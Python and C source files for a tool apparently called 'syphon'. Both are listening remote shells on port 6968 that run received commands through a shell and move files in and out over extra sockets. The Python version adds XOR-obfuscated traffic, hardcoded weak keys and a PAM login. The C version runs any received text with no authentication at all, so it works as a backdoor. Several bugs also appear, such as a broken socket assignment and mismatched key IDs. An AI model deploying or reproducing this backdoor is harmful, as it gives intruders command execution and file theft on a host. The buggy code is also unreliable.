File: python/syphon.py
import os, signal
import socket, random
import subprocess, threading, pam
from multiprocessing import Process
from time import sleep
import pwd

host = "0.0.0.0"
port = 6968
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((host, port))
s.listen(5)
c = ""

keys = { 'xB3s00':'aweakkey12', 'G393s2':'anotherweak' }
user_ids = { 'xB3s00':'user1', 'Ge93s2':'bozo' }

def krypt(text, key):
	krypt_buffer = ""
	for x in reversed(range(0,len(text))):
		byte = text[x]
		primary_round = ord(byte)
		for y in range(0,len(key)):
			primary_round = primary_round ^ ord(key[y])
		primary_round = chr(primary_round)
		krypt_buffer = krypt_buffer + primary_round
	return krypt_buffer

def gen_challenge():
	auth_challenge = ""
	transit_key = ""
	challenge_length = 32
	transit_key_length = 10
	for n in range(0,challenge_length):
		rnd_char = chr(random.randint(0,127))
		auth_challenge = auth_challenge + rnd_char
	for n in range(0,transit_key_length):
		transit_key = transit_key + chr(random.randint(0,127))
	return auth_challenge, transit_key

def gen_krypto_pkt(auth_challenge, transit_key):
	krypt_pkt = krypt(auth_challenge, transit_key)
	krypt_pkt = krypt_pkt + transit_key
        return krypt_pkt

def gen_serverok():
	server_ok = ""
	for s in range(0,2):
		rnd_char = chr(random.randint(0,127))
		server_ok = server_ok + rnd_char
	return server_ok
	

def shutdown_recv(rhost, rport):
	rs.close = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	rsclose.connect((rhost, rport))
	rsclose.close()

def shutdown_send(shost, sport):
	ssclose = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	ssclose.connect((shost, sport))
	ssclose.close()

def shutdown_server(c, s):
	try:
		c.close()
	except AttributeError as aer:
		print aer
	s.close()
	exit(0)

def signal_handler(signal, frame):
	try:
		if send_thread.isAlive():
			shutdown_send(shost, sport)
	except NameError as ner:
		print ner
	try:
		if recv_thread.isAlive():
			shutdown_recv(rhost, rport)
	except NameError as ner:
		print ner
	shutdown_server(c, s)

def recv_server(rhost, rport, rpath):
	rpath = rpath.rstrip('\n')
	try:
		recv_file = open(rpath, "w")
	except IOError as rerr:
		print rerr
        rs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       	rs.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
       	rs.bind((rhost, rport))
       	rs.listen(1)
        rc, raddr = rs.accept()
        while True:
		rdata = rc.recv(8192)
		if not rdata: break
		recv_file.write(rdata)
	recv_file.close()
	rc.close()
	rs.close()

def send_server(shost, sport, spath):
	spath = spath.rstrip('\n')
	try:
		send_file = open(spath, "r")
	except IOError as serr:
		print serr
        ss = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
       	ss.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
       	ss.bind((shost, sport))
       	ss.listen(1)
        sc, saddr = ss.accept()
        for line in send_file.readlines():
			sc.send(line)
	send_file.close()
	sc.close()
	ss.close()

def server(s, c):
	key_id = ""
	while True:
		c, addr = s.accept()
		try:
			key_id = c.recv(64)
		except socket.error as init_error:
			print init_error
		if key_id in user_ids:
			key = keys[key_id]
			auth_challenge, transit_key = gen_challenge()
			auth_challenge = krypt(auth_challenge, transit_key)
			krypto_pkt = gen_krypto_pkt(auth_challenge, transit_key)
			krypto_pkt = krypt(krypto_pkt, key)
			c.send(krypto_pkt)
			krypto_auth_response = c.recv(108)
			auth_response = krypt(krypto_auth_response, transit_key)
			gatekey = auth_challenge + key_id
			if  auth_response != gatekey:
				continue
			else:
				login_prompt = "login: "
				password_prompt = "password: "
				login_prompt = krypt(login_prompt, transit_key)
				c.send(login_prompt)
				user = c.recv(64)
				user = krypt(user, transit_key)
				user = user.rstrip("\n")
				password_prompt = "password: "
				password_prompt = krypt(password_prompt, transit_key)
				c.send(password_prompt)
				password = c.recv(64)
				password = krypt(password, transit_key)
				password = password.rstrip("\n")
				p = pam.pam()
				if p.authenticate(user, password):
					server_ok = gen_serverok()
					c.send(server_ok)
					Process(target=client_handler, args=(c, user, transit_key,)).start()
				else:
					c.close()

def client_handler(c, user, transit_key):
	pw_stuff = pwd.getpwnam(user)
	uid = pw_stuff.pw_uid
	gid = pw_stuff.pw_gid
	home = pw_stuff.pw_dir
	os.setgid(gid)
	os.setuid(uid)
	os.chdir(home)
	while True:
		command = c.recv(128)
		rcmand = krypt(command, transit_key)
		if rcmand == "":
			break
		elif "syphonr" in rcmand:
			opts = rcmand.split(" ")
			try:
				rpath = opts.pop()
				rport = opts.pop()
				rhost = opts.pop()
			except IndexError as ier:
				print ier
			try:
				rport = int(rport)
			except ValueError as ver:
				print ver
			if 'rpath' in locals() and 'rport' in locals() and 'rhost' in locals():
				recv_thread = threading.Thread(target=recv_server, args=(rhost, rport, rpath,))	
				recv_thread.daemon = True
				recv_thread.start()
				c.send("Syphon receive server started successfully\n")
				rcmand = ""
		elif "syphons" in rcmand:
			opts = rcmand.split(" ")
			try:
				spath = opts.pop()
				sport = opts.pop()
				shost = opts.pop()
			except IndexError as ier:
				print ier
			try:
				sport = int(sport)
			except ValueError as ver:
				print ver
			if 'spath' in locals() and 'sport' in locals() and 'shost' in locals():
				send_thread = threading.Thread(target=send_server, args=(shost, sport, spath,))
				send_thread.daemon = True
				send_thread.start()
				c.send("Syphon send server started successfully\n")
				rcmand = ""
		elif rcmand == "exit":
			if 'spath' in locals() and 'sport' in locals() and 'shost' in locals():
				shutdown_send(ss, shost, sport)
			if 'rpath' in locals() and 'rport' in locals() and 'rhost' in locals():
				shutdown_recv(rs, rhost, rport)
				shutdown_server(c, s)
			exit(0)
		else:
			try:
				output = subprocess.check_output(rcmand, stderr=subprocess.STDOUT, shell=True)
			except subprocess.CalledProcessError:
				rcmand_error = "Command not found or error"
				rcmand_error = krypt(rcmand_error, transit_key)
				c.send(rcmand_error)
			else:
				krypted_output = krypt(output, transit_key)
               			c.send(krypted_output)
	c.close()

signal.signal(signal.SIGINT, signal_handler)

server(s, c)

File: c/syphon.c
#include <stdio.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <string.h>
#include <pthread.h>
#define PORT 6968

void *recv_server(void *rcmand)
{
	FILE *recv_file;
	int rs, crs, r;
	struct sockaddr_in raddr;
	int raddrlen = sizeof(raddr);
	char rbuf[8192];
	char *rhost, *rport, *rpath;
        char *rparams = strtok(rcmand, " ");
        for (rparams; rparams != NULL; rparams = strtok(NULL, " "))
       	{
          	if (r == 1) {
               		rhost = strdup(rparams);
		}
       		else if (r == 2) {
              		rport = strdup(rparams);
       		}
       		else if (r == 3) {
               		rpath = strdup(rparams);
       		}
       		r++;
       	}
	rpath[strcspn(rpath, "\n" )] = '\0';
	rpath[strcspn(rpath, "\r" )] = '\0';
	recv_file = fopen(rpath, "w");
	rs = socket(AF_INET, SOCK_STREAM, 0);
	raddr.sin_family = AF_INET;
	//rhost.sin_addr.s_addr = INADDR_ANY;
	raddr.sin_addr.s_addr = inet_addr(rhost);
	raddr.sin_port = htons(atoi(rport));
	bind(rs, (struct sockaddr *)&raddr, sizeof(raddr));
	listen(rs, 1);
	crs = accept(rs, (struct sockaddr *)&raddr,(socklen_t*)&raddrlen);
	while (recv(crs, rbuf, 8192, 0) != 0) {
		fputs(rbuf, recv_file);
		memset(rbuf, 0, 8192);
	}
	fclose(recv_file);
	close(crs);
	close(rs);
	return 0;
}

void *send_server(void *scmand)
{
	FILE *send_file;
	int ss, css, s;
	struct sockaddr_in saddr;
	int saddrlen = sizeof(saddr);
	char *sbuf;
	char *shost, *sport, *spath;
        char *sparams = strtok(scmand, " ");
        for (sparams; sparams != NULL; sparams = strtok(NULL, " "))
       	{
          	if (s == 1) {
               		shost = strdup(sparams);
		}
       		else if (s == 2) {
              		sport = strdup(sparams);
       		}
       		else if (s == 3) {
               		spath = strdup(sparams);
       		}
       		s++;
       	}
	spath[strcspn(spath, "\n" )] = '\0';
	spath[strcspn(spath, "\r" )] = '\0';
	send_file = fopen(spath, "r");
	fseek(send_file, 0, SEEK_END);
	long ssize = ftell(send_file);
	fseek(send_file, 0, SEEK_SET);
	sbuf = (char*)calloc(ssize, sizeof(char));
	fread(sbuf, sizeof(char), ssize, send_file);
	fclose(send_file);
	ss = socket(AF_INET, SOCK_STREAM, 0);
	saddr.sin_family = AF_INET;
	saddr.sin_addr.s_addr = inet_addr(shost);
	saddr.sin_port = htons(atoi(sport));
	bind(ss, (struct sockaddr *)&saddr, sizeof(saddr));
	listen(ss, 1);
	css = accept(ss, (struct sockaddr *)&saddr,(socklen_t*)&saddrlen);
	send(css, sbuf, ssize, 0);
	close(css);
	close(ss);
	return 0;
}

int main()
{
	FILE *cmand;
	int sock, csock, get_rcmand, recv_thread, send_thread, r;
	int status = 1;
	struct sockaddr_in address;
	int addrlen = sizeof(address);
	int opt = 1;
	char rcmand[128];
	char sysout[16384];
	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == 0) {
		perror("Could not connect server.");
		exit(EXIT_FAILURE);
	}
	if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR | SO_REUSEPORT, &opt, sizeof(opt))) {
		perror("setsockopt");
		exit(EXIT_FAILURE);
	}
	address.sin_family = AF_INET;
	address.sin_addr.s_addr = INADDR_ANY;
	address.sin_port = htons( PORT );

	if (bind(sock, (struct sockaddr *)&address, sizeof(address))<0) {
		perror("Could not bind server");
		exit(EXIT_FAILURE);
	}
	listen(sock, 1);
	while (status == 1) {
		if ((csock = accept(sock, (struct sockaddr *)&address,(socklen_t*)&addrlen))<0) {
			perror("Failed to accept.");
			exit(EXIT_FAILURE);
		}
		read(csock, rcmand, 128);
		if (strstr(rcmand, "syphonr")) {
			pthread_t recv_thread;
			pthread_create(&recv_thread, NULL, recv_server, rcmand);
			//pthread_join(recv_thread, NULL);
		}
		else if (strstr(rcmand, "syphons")) {
			pthread_t send_thread;
			pthread_create(&send_thread, NULL, send_server, rcmand);
			//pthread_join(send_thread, NULL);
		}
		else if (strstr(rcmand, "syphon exit")) {
			exit(0);
		}
		else {
			rcmand[strcspn(rcmand, "\n" )] = '\0';
			rcmand[strcspn(rcmand, "\r" )] = '\0';
			cmand = popen(rcmand, "r");
			while (fgets(sysout, sizeof(sysout), cmand) != NULL)
			{
				send(csock, sysout, 2048, 0);
			}
			close(csock);
		}
	}
	close(sock);
}
